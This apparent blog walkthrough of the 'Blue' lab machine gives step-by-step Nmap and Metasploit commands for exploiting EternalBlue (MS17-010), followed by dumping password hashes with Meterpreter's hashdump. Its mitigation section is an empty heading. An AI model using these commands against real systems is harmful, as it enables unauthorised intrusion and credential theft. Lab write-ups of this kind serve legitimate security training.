Back to Blog

Blue Machine Walkthrough

November 28, 2025 Walkthrough EternalBlue Exploit

Overview

Blue is a Windows machine that has the infamous EternalBlue vulnerability (MS17-010). This walkthrough will guide you through the complete exploitation process from reconnaissance to gaining system access.

Initial Setup

First, import the machine in VMware or VirtualBox and set the network adapter to NAT Network to solve connectivity seamlessly.

Network Configuration

Reconnaissance

Next, we'll scan for open ports using Network Mapper (Nmap):

Basic Scan

nmap 10.0.2.3
Initial Nmap Scan

Detailed Service Scan

nmap -p 135,139,445,5357 -A 10.0.2.3
Detailed Nmap Scan Results

Vulnerability Research

After discovering the target is running Windows 7 Ultimate 7601 Service Pack 1, I searched for exploits related to this version.

This version of Windows is vulnerable to the exploit called MS17-010, also known as EternalBlue. Since we found a Rapid7 result and Rapid7 owns Metasploit Framework, we'll use Metasploit for exploitation.

Exploit Research

Exploitation Phase

Starting Metasploit

Open Metasploit Framework in Kali Linux:

msfconsole

Searching for EternalBlue Exploit

search eternalblue
use 0
Metasploit EternalBlue Module

Configuring the Exploit

show options
set rhosts 10.0.2.3

Vulnerability Check

Before exploiting, it's good practice to verify the target is vulnerable:

check
Vulnerability Check Result

Result: The target appears to be vulnerable! ✅

Running the Exploit

exploit

or

run
Successful Exploitation

Post-Exploitation

Congratulations! We have successfully exploited the Blue machine and obtained a Meterpreter session.

Dumping User Hashes

With system-level access, we can dump user password hashes:

hashdump
Hashdump Results

These hashes can be cracked offline using tools like John the Ripper or Hashcat (more on this in future walkthroughs).

Key Takeaways

Mitigation

To protect against EternalBlue attacks: